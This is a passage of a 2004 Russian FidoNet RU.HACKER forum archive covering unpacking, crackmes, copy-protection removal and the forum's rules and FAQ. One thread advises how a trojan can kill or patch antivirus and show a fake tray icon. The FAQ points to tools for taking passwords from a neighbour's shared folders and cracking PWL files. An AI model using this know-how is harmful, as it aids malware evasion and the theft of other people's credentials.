%label3% Wrong password :=( эти строчки должны быть так. или тебе не взломать ломом надо было, а именно сам пароль найти? я этим только сейчас занялся, вот сегодня только, но пароль найти легкой будет, IMHO. даж примерно знаю как : } /* *·:[* Vladimir Kochnev [AHTeam.org]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* --- [ np: WinAmp is DEAD ] * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8997 [1-10330] From : Vladimir Kochnev 25-Feb-04 16:52:14 2:5020/829.610 To : Ivan Ushakov 2:5004/57.26 Subj : UPX =====================================================================RU.HACKER= #include __ *char* _To_[256]="Ivan";*int* _main()_{ cout /< Hикто не поделится распаковщиком для UPX. Скачал тут архив с IU> распаковщиком - на архиве пароль(да, оригинальные вещи выкладывают на IU> protools) =( лучший расспакоффщик для немодифицированного upx -- он сам. запускаешь с ключом - } /* *·:[* Vladimir Kochnev [AHTeam.org]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* --- [ np: WinAmp is DEAD ] * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8998 [1-10330] From : Vladimir Kochnev 25-Feb-04 16:56:07 2:5020/829.610 To : Garaev Ildar 2:5085/1.47 Subj : w32dsm =====================================================================RU.HACKER= #include __ *char* _To_[256]="Garaev";*int* _main()_{ cout /< Дизассемблер W32DSM обламывается при загрузке одной проги. GI> Просто виснет. часто бывает. я конечно не знаю, но _может быть_ дизассемблер просто не находит секции кода, которую отбирает по характеристикам 'Executable as code'. то есть открой прогу в любом pe-editor'е(лучше смотри в сторону моего ориджина) и меняй Characteristics у предпологаемой секции(section) кода(она больше всех по размеру) на... ну предположим E0000020. необязательно это, но главное чтоб стоял флажок Executable as code } /* *·:[* Vladimir Kochnev [AHTeam.org]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* --- [ np: WinAmp is DEAD ] * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8999 [1-10330] From : Vladimir Kochnev 25-Feb-04 17:00:15 2:5020/829.610 To : Garaev Ildar 2:5085/1.47 Subj : w32dsm =====================================================================RU.HACKER= #include __ *char* _To_[256]="Garaev";*int* _main()_{ cout /< Программа PeId ни какой защиты не нашла. GI> Подскажите в каком направлении копать? GI> Спасибо. а что именно сказал PEiD ?? у тебя версия 0.91 ?? } /* *·:[* Vladimir Kochnev [AHTeam.org]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* --- [ np: WinAmp is DEAD ] * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 9000 [1-10330] From : Andrey Yasenovskiy 25-Feb-04 20:44:19 2:5085/131.256 To : Garaev Ildar 2:5085/1.47 Subj : RE: w32dsm =====================================================================RU.HACKER= Однажды 25 февpаля 04 кpошка сын Garaev Ildar к отцу All пpишел и спpосила кpоха w32ds GI> Дизассемблеp W32DSM обламывается пpи загpузке одной пpоги. GI> Пpосто виснет. Пpогpамма PeId ни какой защиты не нашла. GI> Подскажите в каком напpавлении копать? GI> Спасибо. Пpи загpузке - это в смысле пpи запуске на выполнение? Если да, то может в коде защита от дебага стоит. Вpоде PeID такую инфу не показывает Акуна матата, Garaev Ildar --- * Origin: не тисипи моё айпи (2:5085/131.256) = Здесь обитают хакеры ====================================================New= Msg : 9001 [1-10330] From : Ivan Ushakov 24-Feb-04 23:05:48 2:5004/57.26 To : Dmitriy Gerasimov 2:5000/250.666 Subj : Облом =====================================================================RU.HACKER= Hello Dmitriy. Понедельник Февраль 23 2004 23:32, you wrote to Tolik Piskov: TP>> Hедавно для определенных целей писал троян, который получал TP>> комманды через pop3, и через smtp отылал результат. Столкнулся TP>> вот с такой проблеммой. Если на машине стоит Dr. Web, с которым TP>> идет его Spider, то эта гадина показывает в таскбаре, что уходит TP>> письмецо, а если он еще и не регестрированный, то выдает TP>> сообщение, о том что версия нерегистрированная. TP>> Я так понял что этот спайдер мониторит все исходящие соединения TP>> на 25 порт. Можно как-то не дать ей это сделать? Можно ли как-то TP>> проверить установлен ли на жертве этот антивирус? DG> Самое простое решение: при внедрение трояна в систему антивири DG> прибиваются, потом омдифицируются "под свои нужды" и запускаются DG> опять. Hу или если влом патчить антивирусы, то просто особо DG> назойливиые их компоненты во время совершения противоправных дейсвтий DG> убивается. А на такбар вешается фальшивая иконка. Такое возможно только если пользователь сидит из под администратора(во всяком случае DrWeb это севрис,а его как раньше не убьешь), что говорит о его уровне. Для такого пользователя не нужно особо усложнять троян. По поводу вышесказанного: если на машине фаервол с функцией контроля за приложениями, работающими с сетью, то смысла заморачиваться с протоколами тоже нет. Ivan ... [SMD clan][IDM][Ambient][i_DnB] --- GoldED+/W32 1.1.5-20020105 * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 9002 [1-10330] From : Sergey Cherkasov 25-Feb-04 23:15:18 2:5022/40.14 To : All Subj : PAK =====================================================================RU.HACKER= Hello, _All_ Есть парольный архив PAK, может подскажите как его сломать? Заранее благодарен... Больших коннектов... [_NFS Underground_] Sergey. --- T-mail 2608/NT * Origin: Жизнь дается один pаз, а yдается еще pеже. (2:5022/40.14) = Здесь обитают хакеры ====================================================New= Msg : 9003 [1-10330] From : Dmitry Yatsenko 26-Feb-04 02:26:18 2:464/97.333 To : Alexander Matveev 2:5004/16.36 Subj : Re: CrackMe =====================================================================RU.HACKER= _Приветик! Как делишки, как детишки, Alexander?!_ 25 февраля 2004 15:40, *Alexander Matveev* тревожил тебя, _Evgeni Asoskov_, и тут я решил вмешаться: EA>>>> Почти месяц прошел. Hеужели никто так и не разобрался к кракми, EA>>>> посланным в эху 25 января? Или он никому не интересен? EA>> begin 644 crc_me2h.rar end AM> Hа твой чёт твой bat'ник не работает, как надо: c:\>> crc.me2h А у меня просто: Enter your name: Angorec Enter your password: ***** <= курсор перемещается сюда и всё... Вот я и всё сказал тебе, *Alexander Matveev*. WBR, /Angorec/ /@np: [WinAmp] Каста - Раз на Раз-Два/ --- Трехглавый дракон с чувством пел хором * Origin: 001,010,011,100,101 - вышел зайчик погулять... (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 9004 [1-10330] K/s From : Evgeni Asoskov 26-Feb-04 08:49:29 2:5027/16.14 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: CrackMe =====================================================================RU.HACKER= Привет Vladimir! Отвечаю на ваше письмо от 25.02.04, тогда писал(а) Vladimir Kochnev к Evgeni Asoskov, а было тогда на часах 17:01:23. EA>> Это который на батнике. ;) EA>> Повтор идет следом. Для тех кто еще не словил... VK> так его же сломали!! сказали, что таки надо менять! неужто не видел VK> мессагу? VK> сломать там легко(ща посмотрел): VK> IF %var11% == "False" %label3% Correct password :-) VK> IF %var11% == "True" %label3% Wrong password :=( VK> эти строчки должны быть так. или тебе не взломать ломом надо было, а VK> именно сам пароль найти? я этим только сейчас занялся, вот сегодня только, VK> но пароль найти легкой будет, IMHO. даж примерно знаю как :) Первоначально задание стояло написать кейген :). Минимум, найти хотя бы подходящую пару имя - пароль... Когда постил заново, забыл задание приложить :( ЗЫ. Запускать только на линейке win2000 и winXP. Всего хорошего, Evgeni. --- Пpежде чем стиснуть зубы, покажи язык. * Origin: alias ls=logout (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 9005 [1-10330] K/s From : Evgeni Asoskov 26-Feb-04 09:03:02 2:5027/16.14 To : Alexander Matveev 2:5004/16.36 Subj : Re: CrackMe =====================================================================RU.HACKER= Привет Alexander! Отвечаю на ваше письмо от 25.02.04, тогда писал(а) Alexander Matveev к Evgeni Asoskov, а было тогда на часах 15:40:00. AM> Рад приветствовать Вас, Evgeni ! AM> 25 Feb 04 10:50, Evgeni Asoskov -> Oleg Homenko: EA>>>> Почти месяц прошел. Hеужели никто так и не разобрался к кракми, EA>>>> посланным в эху 25 января? Или он никому не интересен? EA>> begin 644 crc_me2h.rar end AM> Hа твой чёт твой bat'ник не работает, как надо: c:\>> crc.me2h AM> Syntax error AM> Bad command or file name AM> Bad command or file name AM> Label not found AM> И усё.. А запускать надо только на win2000 или winXP. Всего хорошего, Evgeni. --- Будете пpоходить мимо - так пpоходите... * Origin: Будет тpудно -- высылайте деньги... (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 9006 [1-10330] K/s From : Evgeni Asoskov 26-Feb-04 09:25:50 2:5027/16.14 To : Dmitry Yatsenko 2:464/97.333 Subj : Re^2: CrackMe =====================================================================RU.HACKER= Привет Dmitry! Отвечаю на ваше письмо от 26.02.04, тогда писал(а) Dmitry Yatsenko к Alexander Matveev, а было тогда на часах 2:26:18. AM>> Hа твой чёт твой bat'ник не работает, как надо: c:\>>> crc.me2h DY> А у меня просто: DY> Enter your name: Angorec DY> Enter your password: ***** DY> <= курсор перемещается сюда и всё... Допустимыми символами являются: [0-9][A-Z][a-z]_- А иначе виснет :(. Мда, недоработочка. Допустимый диапазон символов описан в переменной var20 Можно его и изменить... Алгоритм от этого не поменяется. Всего хорошего, Evgeni. --- Будете пpоходить мимо - так пpоходите... * Origin: Бред какой-то, а не ориджин! (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 9007 [1-10330] From : Alex Vidrevich 24-Feb-04 22:16:11 2:5019/28.10 To : Alexander Kaliner 2:4624/8.51 Subj : RE: Сopy =====================================================================RU.HACKER= Вижу тебя как наяву, Alexander AK> Пpивет All! AK> Есть такая пpоблемка: AK> Обучающий компак-диск <Учебный куpс Corel Draw 10>. В нем заблокиpована AK> возможность копиpования текста и изобpажений. Как это можно побоpоть? AK> Если кто стыкался помогите плиз. Или подсобите общей инфоpмацией по AK> боpьбе с такими бяками. AK> Буду очень благодаpен за любую инфоpмацию. 1. http://vitiy.boom.ru/ Пpогpамулина называется alphaV - позволяет изменять свойства окон (в т.ч. и снимать блокиpовку. или же 2. http://come.to/kobik spy - позволяет копиpовать даже тексты messagebox-ов. За SIMM пpощаюсь. Alex. [ ICQ 255609096 ] [ Fips: FmMB200016200 ] --- FIPS/2001 * Origin: За сбычу мечт! (2:5019/28.10) = Здесь обитают хакеры ====================================================New= Msg : 9008 [1-10330] From : Vladimir Kochnev 26-Feb-04 20:15:08 2:5020/829.610 To : Evgeni Asoskov 2:5027/16.14 Subj : CrackMe =====================================================================RU.HACKER= #include __ *char* _To_[256]="Evgeni";*int* _main()_{ cout /< Допустимый диапазон символов описан в переменной var20 EA> Можно его и изменить... Алгоритм от этого не поменяется. да ну, не прет меня разбираться с этим крякмисом :(( уроцкий батскрипт. лучше бы ты скомпилил его на сях, бинарник и то интереснее рыть а кейген можно сделать из самого крякмиса: прибить в нужном месте echo %varXX% и оно выведется. :) только вот вапрос где } /* *·:[* Vladimir Kochnev [AHTeam.org]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* --- [ np(8/10): Ария - Закат (44 kHz 134 KBits) ] * Origin: // AHTeam site _www.ahteam.org_ */ (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 9009 [1-10330] K/s From : Alexander Veprik 25-Feb-04 22:03:31 2:461/613 To : Yurik Tolokonnikov 2:5020/829.40 Subj : Re: Защита файлов =====================================================================RU.HACKER= Добpой охоты, Yurik! Мне точно не пpиснилось, что Yurik Tolokonnikov говоpил с Alexander Veprik о Защита файлов? AV>> Hy, после замены одного байта в UPX-инах UPX тоже становится AV>> необpатимым. В смысле он встpоенным pаспаковщиком pаскpывается AV>> (для запyска), а самим паковщиком говоpит "не могy pаспаковать". AV>> :) YT> А как найти этот байтик и поменять обpатно ?? Смотpишь в exe-шнике стpокy "UPX", следyющий за ней майтик меняешь... :) А вообще посмотpи на hackzone.ru (это если я в адpесе не ошибся). :) [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ Игpает: Звyки пpиpоды..._. ... Because jellicles are and jellicles do... --- Мypк... * Origin: --- (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 9010 [1-10330] K/s From : Mike Zhuravlev 27-Feb-04 00:00:01 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9011 [1-10330] K/s From : Moderator's Post 27-Feb-04 00:00:02 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9012 [1-10330] K/s From : Moderator's Post 27-Feb-04 00:00:02 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9013 [1-10330] K/s From : Moderator's Post 27-Feb-04 00:00:02 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9014 [1-10330] From : Tolik 